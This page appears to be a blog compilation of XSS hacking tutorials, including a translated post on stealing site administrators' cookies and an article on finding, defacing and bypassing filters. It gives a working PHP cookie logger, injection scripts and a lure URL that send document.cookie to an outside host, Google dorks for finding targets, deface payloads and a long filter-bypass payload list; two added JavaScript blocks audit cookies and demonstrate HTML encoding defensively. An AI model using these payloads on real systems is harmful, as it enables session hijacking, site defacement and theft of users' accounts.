Ebook XSS Attacks


xss

This book is all about XSS. It covers the following topics:

Cross-site Scripting Fundamentals.

The XSS Discovery Toolkit

XSS Theory

XSS Attack Methods

Advanced XSS Attack Vectors

XSS Exploited

Exploit Frameworks

XSS Worms

Preventing XSS Attacks

Download

How do you exploit an XSS flaw?


An XSS flaw is one that allows unauthorized scripts to be executed on the user's client; you can read more here: Cross Site Scripting

Back in the day, when I was messing around, I used it to execute a command like

<script>

window.location="http:///xxxx.yyy";

</script>

where http:///xxxx.yyy is some racy site, the idea being to give the admin some entertainment when tired.

Nowadays when I come across a vulnerable site I'm not foolish enough to do that anymore, since it accomplishes nothing except helping them fix the bug, and letting them know about my racy sites too.

When you come across a site with an XSS flaw, the task now is to grab the admin's cookie, then log in as admin and do whatever you like.

To test whether the site's cookie can be read in full, try typing this simple command into the address bar:

javascript:alert(document.cookie);

For example, take the page http://thamhue.com/forum.php: log in and use Firebug to view the cookie, as in the picture

image

run the command above and compare with the cookie shown in Firebug

image

Hey, it's different, so it can't be exploited; if it were XSS-vulnerable I'd just send it to a racy site out of frustration

Let's find another site. Suppose some site has an XSS flaw and the cookie can be read; we write a script that sends the browser to our own page to save the cookie and then sends it back to whatever page we choose; the goal is just to get the cookie.

Suppose I have a free PHP host. We go in and create a file named cc.php and a text file named cookie.txt

file cc.php

<?php
$myFile = "cookie.txt";
$fh = fopen($myFile, 'a+');
$bien=$_REQUEST['cc'].":".$_REQUEST['url']."\n";
fwrite($fh,$bien);
fclose($fh);
echo("<script>window.location='".$_REQUEST['url']."';</script>");
?>

the cookie.txt file is left empty and chmod'ed to allow read & write

for example, I did this and uploaded the files to the addresses

http://vitinh2nd.com/cc.php

http://vitinh2nd.com/cookie.txt

When you come across a site http://xyz.xxx with an XSS flaw, write the following script:

<script>

window.location="http://vitinh2nd.com/cc.php?cc="+document.cookie+"&url=http://xyz.xxx";

</script>

Explanation: when the admin visits and this script runs, the browser goes to our page, saves the cookie into the cookie.txt file, then returns to the original page; the url is saved so we know which domain to exploit, and also so that a clueless admin thinks the site just had some glitch.

That's it. After obtaining the cookie, how do we log in?

You can use the Cookie Manager add-on for Firefox to edit and add the cookie's fields, then press F5 and you're logged in, as in the picture

image

 

Conclusion: is XSS the only way to get a cookie? There are many other ways, for example the following:

for instance, on a site with an editor that allows editing the HTML, you can write a long post praising whatever, then insert a link along the lines of "click here to read more"

<a href="#" onclick="javascript:window.location='http://vitinh2nd.com/cc.php?cc='+document.cookie+'&url=http://xyz.xxx';" >Click here to see details</a>

When they click it, the command above runs

The second way is the "chém gió" (smooth-talking) technique; this is a good one, and you can see the art of it in the post: https://tranphuochung.wordpress.com/2011/07/21/chem-gio-la-gi/

To lure the victim you have to talk it up well, for example: "type this command in your browser"

javascript:window.location="http://vitinh2nd.com/cc.php?cc="+document.cookie+"&url=http://xyz.xxx";

"and you'll hack some money", or something about checking for a bug, or whatever, depending on the talker.

So this XSS flaw can be exploited by logging in as admin, then uploading a shell to the server and taking the victim's data.

As for how to fix it, you can search Google; my knowledge only goes this far, so if anything is wrong please don't flame me.

Cross Site Scripting (XSS)


'XSS', also known as 'CSS' (Cross Site Scripting), is a very common vulnerability found in web applications. XSS allows the attacker to INSERT malicious code. There are many types of XSS attacks; I will mention the 3 most used. This kind of vulnerability allows an "attacker" to inject code into the affected application in order to bypass access controls on the website or to apply "phishing" to unsuspecting users.
This technique is also used for website hacking.
Types of XSS


There are actually three types of Cross-Site Scripting, commonly named as:

– DOM-Based XSS
– Non-persistent XSS
– Persistent XSS

DOM-Based : DOM-Based Cross-Site Scripting allows an attacker to work not on a victim website but on a victim's local machine: the various operating systems usually include "from birth" some HTML pages created for different purposes, but as long as humans make mistakes these HTML pages can often be exploited due to code vulnerabilities.
DOM-Based XSS exploits these problems on users' local machines in this way:

– The attacker creates a well-built malicious website

– The ingenuous user opens that site

– The user has a vulnerable page on his machine

– The attacker's website sends commands to the vulnerable HTML page

– The vulnerable local page executes those commands with the user's privileges on that machine.

– The attacker easily gains control of the victim's computer.
Non-Persistent : Non-persistent XSS is actually the most common vulnerability that can be found on the Net. It is commonly named "non-persistent" because it works on an immediate HTTP response from the victim website: it shows up when the webpage takes the data provided by the attacker's client to automatically generate a result page for the attacker himself. Based on this, the attacker could provide some malicious code and try to make the server execute it in order to obtain some result.
The most common application of this kind of vulnerability is in the search engines of websites: the attacker writes some arbitrary HTML code in the search textbox and, if the website is vulnerable, the result page will return the rendered result of that HTML.
Persistent : Persistent XSS vulnerabilities are similar to the second type (Non-persistent XSS), because both work on a victim site and try to steal users' information; the difference is that on websites vulnerable to Persistent XSS the attacker doesn't need to provide the crafted URL to the users, because the website itself permits users to insert fixed data into the system: this is the case, for example, of "guestbooks". Usually users use that kind of tool to leave messages to the owner of the website, and at first glance it doesn't seem dangerous, but if an attacker discovers that the system is vulnerable he can insert some malicious code in his message and make ALL visitors victims of it.
This works when the tool provided (the guestbook in the example) doesn't do any check on the content of the inserted message: it just inserts the data provided by the user into the result page.


How to Find XSS Vulnerabilities:-
To start finding these vulnerabilities you can start by checking out blogs, forums, shoutboxes, comment boxes, search boxes; there are too many to mention.
Using 'Google Dorks' makes the finding easier. OK, if you wanna get cracking, go to google.com and type inurl:"search.php?q=" now that is a common page and has a lot of results. Also note that most sites have XSS vulnerabilities; it's just about having a good eye, and some good knowledge of how to bypass their filtering.
Basics of XSS:-
Well now let's start learning some actual methods. The most commonly used XSS injection is:
<script>alert("hackingandtips.blogspot.com")</script>
Now this will alert a popup message saying "hackingandtips.blogspot.com" without quotes.
So, use "search.php?q=" and you can simply try the following on a website with the same thing:
http://website.com/search.php?q=<script>alert("hackingandtips.blogspot.com")</script>
There are good chances of it working, but don't be worried if it doesn't, just try different sites. You can insert HTML, not just JavaScript:
http://website.com/search.php?q=<br><br><b><u>hackingandtips.blogspot.com</u></b>
If you see the bold text on the page and newlines then you know it's vulnerable.
Example:

XSS Bollywood


How to Deface a Website using XSS ?
Well now you understand how XSS works, we can explain some simple XSS deface methods. There are many ways of defacing; I will mention some of the best and most used, the first one being IMG SRC. Now for those of you who don't know HTML, IMG SRC is a tag that displays the image linked to it on the webpage.
<html><body><IMG SRC="http://website.com/yourDefaceIMAGE.png"></body></html>
OK, now if you change the link to a valid picture link, save it and run it you will see what I mean. Right, now say you have found a shoutbox, comment box, or anything that shows your data after you submitted it; you could insert the following to make the picture display on the page.
<IMG SRC="http://site.com/yourDefaceIMAGE.png">
The other tags are not needed as the page will already have them. OK, it helps to make your picture big so it stands out and it's clear the site got hacked. Another method is using FLASH videos; it's the same as the method above but a more stylish deface.
<EMBED SRC="http://site.com/xss.swf">
That will execute the flash video linked to it. Or maybe using a popup or redirection such as:
<script>window.open( "http://www.hackersonlineclub.tk/" )</script>
There are many other ways that you can find using Google or other websites. My purpose is to make you understand the concept 🙂
How to Cookie Stealing using XSS ?
I decided to add this as it's the most useful method of XSS. First learn how to make a cookie logger from here: How To Make A Cookie Stealer Php script ?
OK, now you have it, save it as a .php file and upload it to your server; remember to create the file 'log.txt' too and chmod it to 777. OK, now find an XSS vulnerable website, any attack type will do; now you're gonna want to insert this code.
window.location = "http://yourServer.com/cookielogger.php?c="+document.cookie
or
document.location = "http://yourServer.com/cookielogger.php?c="+document.cookie
Now when a user visits the page that got injected, they will be sent to the site and the cookie will be stolen; the second one is more stealthy. Watch your file now for cookies, then you can hijack their session 😀
But now you ask: what if my site hasn't got this kind of attack, it only shows data once and doesn't store it? Well, let's say we had a page search.php?q=; we can use the following code to make a malicious URL from it, and maybe hex or base64 encode it so people can't see the code
http://site.com/search.php?q=document.location = "http://yourServer.com/cookielogger.php?c="+document.cookie
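Added example, not code from either post on this page: a Set-Cookie audit showing the defender's side of the cookie theft described here and in the first post. A cookie marked HttpOnly is sent by the browser but never exposed through document.cookie, which is why the javascript:alert(document.cookie) test can show fewer cookies than Firebug does. The header values are constructed sample data, and the name heuristic for authentication cookies is an assumption of this example.

```javascript
// Constructed Set-Cookie headers as a server might emit them (not from a real site).
const SAMPLE_SET_COOKIE_HEADERS = [
  "PHPSESSID=3f9c1a2b7d; Path=/; HttpOnly; Secure; SameSite=Lax",       // hardened session
  "lang=vi; Path=/; Max-Age=31536000",                                   // harmless preference
  "remember_me=9a8b7c6d; Path=/; Expires=Wed, 01 Jan 2025 00:00:00 GMT", // login token, exposed
];

// Parse one Set-Cookie header into { name, value, attrs }; attribute names are
// lower-cased and valueless attributes (HttpOnly, Secure) become true.
function parseSetCookie(header) {
  const [pair, ...rest] = header.split(";").map((s) => s.trim());
  const eq = pair.indexOf("=");
  const name = eq === -1 ? pair : pair.slice(0, eq);
  const value = eq === -1 ? "" : pair.slice(eq + 1);
  const attrs = {};
  for (const part of rest) {
    if (!part) continue;
    const i = part.indexOf("=");
    const key = (i === -1 ? part : part.slice(0, i)).toLowerCase();
    attrs[key] = i === -1 ? true : part.slice(i + 1);
  }
  return { name, value, attrs };
}

// Names an injected script would see in document.cookie: everything not HttpOnly.
function scriptVisibleCookieNames(headers) {
  return headers.map(parseSetCookie).filter((c) => !c.attrs.httponly).map((c) => c.name);
}

// Cookies whose name suggests authentication material (heuristic assumed by this
// example) that lack the attributes limiting script access and network exposure.
const AUTH_NAME_HINT = /sess|token|auth|remember|login/i;
function auditCookies(headers) {
  const findings = [];
  for (const c of headers.map(parseSetCookie)) {
    if (!AUTH_NAME_HINT.test(c.name)) continue;
    const missing = [];
    if (!c.attrs.httponly) missing.push("HttpOnly");
    if (!c.attrs.secure) missing.push("Secure");
    if (!c.attrs.samesite) missing.push("SameSite");
    if (missing.length) findings.push({ name: c.name, missing });
  }
  return findings;
}

console.log("visible to document.cookie:", scriptVisibleCookieNames(SAMPLE_SET_COOKIE_HEADERS));
console.log("findings:", auditCookies(SAMPLE_SET_COOKIE_HEADERS));
```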


How to Bypass Filtration ?
A lot of sites may seem vulnerable but not execute the code; well, to solve this read this. Some common methods to bypass filtration are
')alert('xss');
or
");alert('xss');
That will do the same thing as <script>alert("XSS")</script> on a vulnerable server. You can also try hexing or base64 encoding your data before you submit. Please note it's bad practice to use alert("XSS") to test for XSS, because some sites block the keyword "XSS", so we use "hackingandtips.blogspot.com".
Some other ways to bypass filtration
website.com/search.php?q="><script>alert("xss test")</script>
website.com/search.php?q="><script>alert("xss test!")</script>
website.com/search.php?q="><script>alert("hackingandtips.blogspot.com");</script>
website.com/search.php?q="><script>alert(/hackingandtips.blogspot.com");</script>
website.com/search.php?q=//"><script>alert(/hackingandtips.blogspot.com/);</script>
website.com/search.php?q=abc<script>alert(/hackingandtips.blogspot.com/);</script>
website.com/search.php?q=abc"><script>alert(/hackingandtips.blogspot.com/);</script>
website.com/search.php?q=abc"></script><script>alert(/hackingandtips.blogspot.com/);</script>
website.com/search.php?q=abc//abc"></script>alert(/hackingandtips.blogspot.com/);</script>
website.com/search.php?q=000"><script></script><script>alert(hackingandtips.blogspot.com);</script>
website.com/search.php?q=000abc</script><script>alert(/hackingandtips.blogspot.com/);</script>
website.com/search.php?q=–<script>"></script>alert(/hackingandtips.blogspot.com/);</script>
website.com/search.php?q=pwned<script>document.write('hackingandtips.blogspot.com');</script>
website.com/search.php?q=pwned</script><script>document.write(hackingandtips.blogspot.com);</script>
website.com/search.php?q=pwned')alert(hackingandtips.blogspot.com);//
website.com/search.php?q=pwned";)alert(hackingandtips.blogspot.com);//
website.com/search.php?q=pwned");alert(/hackingandtips.blogspot.com/);//
website.com/search.php?q=pwned//"></script><script>location.href='javascript:alert(/hackingandtips.blogspot.com/);</script>
website.com/search.php?q="><img src='javascript:alert('hackingandtips.blogspot.com');'>
website.com/search.php?q="><script src='http://malicous js'</script>


Advanced XSS – way to bypass magic quotes filtration:
OK, now we are going to learn about some good techniques. I have come across many sites where 'Magic Quotes' is on, therefore rendering some commands useless. Fear not, I have come up with a way using char codes (decimals), converting char codes to ASCII. For the function that turns char codes (decimals) into ASCII, you can find a complete table here


http://www.asciitable.com/

http://easycalculation.com/

This will help you write what you want. In my examples I'll be writing "HOC"; this is the following code
72 79 67
OK, now we've got the decimal value of our string, we need to know what function in JavaScript converts this.
String.fromCharCode()
is suitable for this kind of thing; it's easy to set up, I'm gonna give it my args below.
String.fromCharCode(72, 79, 67)
OK, now "String.fromCharCode(72, 79, 67)" is the JavaScript (ASCII) way of saying "HOC".
And to use this with alerts etc., you don't need to use quotes, as it acts as a variable.
<script>alert(String.fromCharCode(72, 79, 67))</script>
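Added example, not code from the original article: the defender's view of the search.php?q= reflection used throughout this page and of the magic-quotes point just made. It runs payloads taken from the page's own lists through three server-side treatments of the reflected parameter (none, backslash quote escaping as magic quotes did, and HTML entity encoding) and counts how many still introduce markup into a result page. The result-page template and the tag check are assumptions of this example.

```javascript
// Payloads from this page's own lists; the last two contain no quotes at all,
// which is exactly the case the magic-quotes section above is about.
const PAGE_PAYLOADS = [
  '<script>alert("hackingandtips.blogspot.com")</script>',
  '"><script>alert(/hackingandtips.blogspot.com/);</script>',
  'abc"></script><script>alert(/hackingandtips.blogspot.com/);</script>',
  '<script>alert(String.fromCharCode(72, 79, 67))</script>',
  '<br><br><b><u>hackingandtips.blogspot.com</u></b>',
];

// Magic-quotes style filter: backslash quotes and backslashes, nothing else.
// A backslash is not an escape character in HTML, so \"> still closes an
// attribute and <script> passes through untouched.
function addSlashes(s) {
  return s.replace(/[\\'"]/g, (ch) => "\\" + ch);
}

// Context-aware encoding for text placed in an HTML body or a quoted attribute:
// every character that can change the HTML context becomes an entity.
const HTML_ENTITIES = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#x27;" };
function escapeHtml(s) {
  return s.replace(/[&<>"']/g, (ch) => HTML_ENTITIES[ch]);
}

// Assumed result page of the article's search.php, reflecting q in the two places
// such pages usually put it: the search box value attribute and the heading text.
function renderResultPage(q, encode) {
  const safe = encode(q);
  return `<input name="q" value="${safe}"><p>Results for ${safe}</p>`;
}

// Tags present in the rendered page that the template itself did not emit.
const TEMPLATE_TAGS = ["input", "p", "/p"];
function injectedTags(html) {
  const tags = [...html.matchAll(/<\s*(\/?[a-zA-Z][a-zA-Z0-9]*)/g)].map((m) => m[1].toLowerCase());
  return tags.filter((t) => !TEMPLATE_TAGS.includes(t));
}

// How many of the page's payloads still introduce markup under a given treatment.
function countPayloadsInjectingMarkup(encode) {
  return PAGE_PAYLOADS.filter((p) => injectedTags(renderResultPage(p, encode)).length > 0).length;
}

const noEncoding = (s) => s;
console.log("no encoding:", countPayloadsInjectingMarkup(noEncoding));   // all 5
console.log("magic quotes:", countPayloadsInjectingMarkup(addSlashes));  // still all 5
console.log("HTML encoding:", countPayloadsInjectingMarkup(escapeHtml)); // 0
```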
For More Script Coding Of XSS Visit

http://ha.ckers.org/xss.html